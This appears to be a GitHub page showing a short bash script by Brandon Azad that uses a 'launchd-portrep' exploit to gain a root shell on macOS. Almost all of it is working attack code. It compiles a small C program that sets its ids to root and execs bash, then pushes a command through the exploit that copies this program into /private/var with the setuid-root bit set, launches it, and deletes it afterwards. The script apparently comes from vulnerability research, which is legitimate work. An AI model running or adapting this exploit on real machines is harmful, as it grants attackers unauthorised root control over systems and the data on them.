-
Notifications
You must be signed in to change notification settings - Fork 6
/
launchd-portrep-rootsh.sh
executable file
·50 lines (35 loc) · 1.08 KB
/
launchd-portrep-rootsh.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#! /bin/bash
#
# launchd-portrep-rootsh.sh
# Brandon Azad
#
# An example using launchd-portrep to get a root shell. Requires developer tools.
#
cd "$( dirname "${BASH_SOURCE[0]}" )"
error() {
echo "Error: $1"
exit 1
}
make -s || error "Could not build launchd-portrep"
cat << EOF > suid-sh.c || error "Could not write suid-sh.c"
#include <unistd.h>
int main(int argc, char **argv) {
seteuid(0);
setuid(0);
setgid(0);
argv[0] = "/bin/bash";
return execve(argv[0], argv, NULL);
}
EOF
clang suid-sh.c -o suid-sh || error "Failed to compile suid-sh.c to suid-sh"
rm suid-sh.c
TARGET_SHELL="/private/var/suid-sh"
SHELL_COMMAND="$(which cp) $(pwd)/suid-sh $TARGET_SHELL; $(which chmod) 4555 $TARGET_SHELL"
pgrep -q sysdiagnose && error "sysdiagnose is running!"
./launchd-portrep "$SHELL_COMMAND" || error "launchd-portrep failed"
rm suid-sh
[ -f "$TARGET_SHELL" ] || error "Exploit payload failed to create $TARGET_SHELL"
echo "Launching $TARGET_SHELL"
# We'll remove the file automatically after one second.
( "$TARGET_SHELL" -c "sleep 1; rm '$TARGET_SHELL'") &
exec "$TARGET_SHELL"